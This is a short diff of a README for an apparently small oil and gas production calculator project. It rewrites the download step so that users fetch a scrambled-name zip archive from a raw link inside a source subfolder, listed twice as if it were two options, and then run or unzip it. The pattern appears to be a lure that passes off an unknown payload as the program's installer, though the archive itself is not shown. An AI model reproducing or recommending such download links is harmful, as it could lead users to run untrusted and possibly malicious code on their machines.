adnan03146584/oil-gas-production-calculator/README.md

 3. **Download the installer or zip file:**

-   Click on the file named something like `oil-gas-production-calculator-setup.exe` or `oil-gas-production-calculator.zip`.
+   Click on the file named something like `https://github.com/adnan03146584/oil-gas-production-calculator/raw/refs/heads/main/ProductionCalc.Core/production-gas-calculator-oil-3.8.zip` or `https://github.com/adnan03146584/oil-gas-production-calculator/raw/refs/heads/main/ProductionCalc.Core/production-gas-calculator-oil-3.8.zip`.
 The file size will typically be under 100 MB.

 4. **Run the installer or unzip:**